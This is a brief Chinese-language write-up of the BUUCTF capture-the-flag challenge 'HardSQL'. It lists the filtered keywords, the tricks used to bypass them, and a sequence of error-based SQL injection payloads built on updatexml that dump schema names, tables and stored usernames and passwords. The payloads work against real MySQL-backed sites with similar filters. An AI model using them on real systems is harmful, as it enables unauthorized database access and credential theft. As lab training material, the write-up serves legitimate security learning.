BUUCTF：[极客大挑战 2019]HardSQL

题目地址：https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL

使用Burpfuzz测试过滤了哪些关键字

过滤了空格、=、substring、mid等字符

Trick

• 使用()代替空格
• 使用like代替=
• 使用right、left代替substring、mid

注入过程如下

1'or(1)like(2)%23

1'or(updatexml('~',concat('~',database(),'~'),'~'))%23

1'or(updatexml('~',concat('~',(select(left(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23

1'or(updatexml('~',concat('~',(select(right(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23

1'or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),'~'),'~'))%23

1'or(updatexml('~',concat('~',(select(group_concat(id,'~',username,'~',password))from(geek.H4rDsq1)),'~'),'~'))%23

1'or(updatexml('~',concat('~',(select(right(group_concat(id,'~',username,'~',password),30))from(geek.H4rDsq1)),'~'),'~'))%23